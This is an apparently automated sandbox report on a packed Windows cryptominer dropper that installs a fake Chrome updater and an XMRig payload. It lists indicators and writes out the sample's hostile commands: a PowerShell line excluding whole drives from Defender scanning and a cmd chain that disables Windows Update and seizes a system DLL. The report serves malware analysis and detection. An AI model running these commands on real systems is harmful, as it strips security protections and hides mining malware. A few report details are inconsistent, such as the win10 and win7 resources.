Analysis
- max time kernel: 300s
- max time network: 294s
- platform: windows10_x64
- resource: win10-20220414-en
- resource tags: arch:x64, arch:x86, image:win10-20220414-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 05-08-2022 22:18
Behavioral task: behavioral1
- Sample: 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
- Resource: win7-20220718-en
General
- Target: 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
- Size: 7.1MB
- MD5: 2144e985a1fb8a18636dee1b1fcf096f
- SHA1: fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
- SHA256: 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
- SHA512: 48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
Malware Config
Signatures
Modifies security service 2 TTPs 5 IoCs
Processes: reg.exe
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes: updater.exe, 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | updater.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
XMRig Miner payload 6 IoCs
resource | yara_rule
behavioral2/memory/3112-451-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral2/memory/3112-452-0x000000014036EAC4-mapping.dmp | xmrig
behavioral2/memory/3112-454-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral2/memory/3112-456-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral2/memory/3112-469-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral2/memory/3112-470-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
Drops file in Drivers directory 2 IoCs
Processes: conhost.exe, conhost.exe
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
Executes dropped EXE 1 IoCs
Processes: updater.exe
pid | process
2308 | updater.exe
Possible privilege escalation attempt 4 IoCs
Processes: takeown.exe, icacls.exe, takeown.exe, icacls.exe
pid | process
1644 | takeown.exe
4040 | icacls.exe
1596 | takeown.exe
3188 | icacls.exe
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: updater.exe, 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | updater.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | updater.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Modifies file permissions 1 TTPs 4 IoCs
Processes: icacls.exe, takeown.exe, icacls.exe, takeown.exe
pid | process
4040 | icacls.exe
1596 | takeown.exe
3188 | icacls.exe
1644 | takeown.exe
Themida packer 7 IoCs
resource | yara_rule
behavioral2/memory/544-118-0x0000000000400000-0x0000000001066000-memory.dmp | themida
behavioral2/memory/544-119-0x0000000000400000-0x0000000001066000-memory.dmp | themida
behavioral2/memory/544-121-0x0000000000400000-0x0000000001066000-memory.dmp | themida
C:\Program Files\Google\Chrome\updater.exe | themida
C:\Program Files\Google\Chrome\updater.exe | themida
behavioral2/memory/2308-261-0x0000000000400000-0x0000000001066000-memory.dmp | themida
behavioral2/memory/2308-263-0x0000000000400000-0x0000000001066000-memory.dmp | themida
Checks whether UAC is enabled 2 IoCs
Processes: 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe, updater.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | updater.exe
Drops file in System32 directory 4 IoCs
Processes: powershell.EXE, powershell.exe, conhost.exe
description | ioc | process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log | conhost.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes: 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe, updater.exe
pid | process
544 | 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
2308 | updater.exe
Suspicious use of SetThreadContext 1 IoCs
Processes: conhost.exe
description | pid | process | target process
PID 2600 set thread context of 3112 | 2600 | conhost.exe | explorer.exe
Drops file in Program Files directory 3 IoCs
Processes: powershell.exe, conhost.exe
description | ioc | process
File opened for modification | C:\Program Files\Google\Chrome\updater.exe | powershell.exe
File created | C:\Program Files\Google\Libs\WR64.sys | conhost.exe
File created | C:\Program Files\Google\Chrome\updater.exe | powershell.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe (10 instances)
pid | process
4860 | sc.exe
2732 | sc.exe
4808 | sc.exe
3196 | sc.exe
3768 | sc.exe
5056 | sc.exe
1896 | sc.exe
2940 | sc.exe
4912 | sc.exe
3736 | sc.exe
Modifies data under HKEY_USERS 64 IoCs
Processes: powershell.exe, powershell.EXE, conhost.exe
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.EXE
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Modifies registry key 1 TTPs 18 IoCs
Processes: reg.exe (18 instances)
pid | process
1784 | reg.exe
4452 | reg.exe
1932 | reg.exe
3876 | reg.exe
3460 | reg.exe
1536 | reg.exe
2644 | reg.exe
1848 | reg.exe
1984 | reg.exe
60 | reg.exe
4480 | reg.exe
4544 | reg.exe
4788 | reg.exe
2200 | reg.exe
4520 | reg.exe
4564 | reg.exe
4536 | reg.exe
1880 | reg.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: powershell.exe, conhost.exe, powershell.exe, powershell.EXE, powershell.exe, conhost.exe, explorer.exe
pid | process | entries
1196 | powershell.exe | 3
680 | conhost.exe | 1
3180 | powershell.exe | 3
1532 | powershell.EXE | 3
5016 | powershell.exe | 3
2600 | conhost.exe | 1
3112 | explorer.exe | 50
Suspicious behavior: LoadsDriver 1 IoCs
pid | process
656 | (process name not given in the report)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: powershell.exe, powercfg.exe, conhost.exe, powercfg.exe, powercfg.exe, powercfg.exe, takeown.exe, powershell.exe
pid | process | tokens (in the order reported)
1196 | powershell.exe | SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
4832 | powercfg.exe | SeShutdownPrivilege, SeCreatePagefilePrivilege
680 | conhost.exe | SeDebugPrivilege
4256 | powercfg.exe | SeShutdownPrivilege, SeCreatePagefilePrivilege
4208 | powercfg.exe | SeShutdownPrivilege, SeCreatePagefilePrivilege
4192 | powercfg.exe | SeShutdownPrivilege, SeCreatePagefilePrivilege
1644 | takeown.exe | SeTakeOwnershipPrivilege
3180 | powershell.exe | SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege
Suspicious use of WriteProcessMemory 64 IoCs
Processes: 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe, conhost.exe, cmd.exe, cmd.exe
description | pid | process | target process | entries
PID 544 wrote to memory of 680 | 544 | 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe | conhost.exe | 3
PID 680 wrote to memory of 1196 | 680 | conhost.exe | powershell.exe | 2
PID 680 wrote to memory of 4252 | 680 | conhost.exe | cmd.exe | 2
PID 680 wrote to memory of 4884 | 680 | conhost.exe | cmd.exe | 2
PID 4252 wrote to memory of 3768 | 4252 | cmd.exe | sc.exe | 2
PID 4884 wrote to memory of 4832 | 4884 | cmd.exe | powercfg.exe | 2
PID 4252 wrote to memory of 4860 | 4252 | cmd.exe | sc.exe | 2
PID 4884 wrote to memory of 4256 | 4884 | cmd.exe | powercfg.exe | 2
PID 4252 wrote to memory of 5056 | 4252 | cmd.exe | sc.exe | 2
PID 4884 wrote to memory of 4208 | 4884 | cmd.exe | powercfg.exe | 2
PID 4884 wrote to memory of 4192 | 4884 | cmd.exe | powercfg.exe | 2
PID 4252 wrote to memory of 2732 | 4252 | cmd.exe | sc.exe | 2
PID 4252 wrote to memory of 1896 | 4252 | cmd.exe | sc.exe | 2
PID 4252 wrote to memory of 1932 | 4252 | cmd.exe | reg.exe | 2
PID 4252 wrote to memory of 4788 | 4252 | cmd.exe | reg.exe | 2
PID 4252 wrote to memory of 2200 | 4252 | cmd.exe | reg.exe | 2
PID 4252 wrote to memory of 3876 | 4252 | cmd.exe | reg.exe | 2
PID 4252 wrote to memory of 60 | 4252 | cmd.exe | reg.exe | 2
PID 4252 wrote to memory of 1644 | 4252 | cmd.exe | takeown.exe | 2
PID 680 wrote to memory of 3180 | 680 | conhost.exe | powershell.exe | 2
PID 4252 wrote to memory of 4040 | 4252 | cmd.exe | icacls.exe | 2
PID 4252 wrote to memory of 4480 | 4252 | cmd.exe | reg.exe | 2
PID 4252 wrote to memory of 4520 | 4252 | cmd.exe | reg.exe | 2
PID 4252 wrote to memory of 4544 | 4252 | cmd.exe | reg.exe | 2
PID 4252 wrote to memory of 1784 | 4252 | cmd.exe | reg.exe | 2
PID 4252 wrote to memory of 3188 | 4252 | cmd.exe | schtasks.exe | 2
PID 4252 wrote to memory of 2956 | 4252 | cmd.exe | schtasks.exe | 2
PID 4252 wrote to memory of 4640 | 4252 | cmd.exe | schtasks.exe | 2
PID 4252 wrote to memory of 1576 | 4252 | cmd.exe | schtasks.exe | 2
PID 4252 wrote to memory of 1884 | 4252 | cmd.exe | schtasks.exe | 2
PID 4252 wrote to memory of 2612 | 4252 | cmd.exe | schtasks.exe | 2
PID 4252 wrote to memory of 4664 | 4252 | cmd.exe | schtasks.exe | 1
Processes
[1] C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\conhost.exe
      command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"
      - Drops file in Drivers directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"
        decoded (UTF-16LE base64): <#pa#> Add-MpPreference <#adjz#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#ws#> -Force <#ry#>
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\cmd.exe
        command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\sc.exe
          command line: sc stop UsoSvc
          - Launches sc.exe
      [4] C:\Windows\system32\sc.exe
          command line: sc stop WaaSMedicSvc
          - Launches sc.exe
      [4] C:\Windows\system32\sc.exe
          command line: sc stop wuauserv
          - Launches sc.exe
      [4] C:\Windows\system32\sc.exe
          command line: sc stop bits
          - Launches sc.exe
      [4] C:\Windows\system32\sc.exe
          command line: sc stop dosvc
          - Launches sc.exe
      [4] C:\Windows\system32\reg.exe
          command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          - Modifies security service
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          - Modifies registry key
      [4] C:\Windows\system32\takeown.exe
          command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          - Possible privilege escalation attempt
          - Modifies file permissions
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\icacls.exe
          command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\reg.exe
          command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\schtasks.exe
          command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    [3] C:\Windows\System32\cmd.exe
        command line: "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\powercfg.exe
          command line: powercfg /x -hibernate-timeout-ac 0
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\powercfg.exe
          command line: powercfg /x -hibernate-timeout-dc 0
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\powercfg.exe
          command line: powercfg /x -standby-timeout-ac 0
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\powercfg.exe
          command line: powercfg /x -standby-timeout-dc 0
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
        - Drops file in Program Files directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHEAYgAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAbQBzACMAPgA="
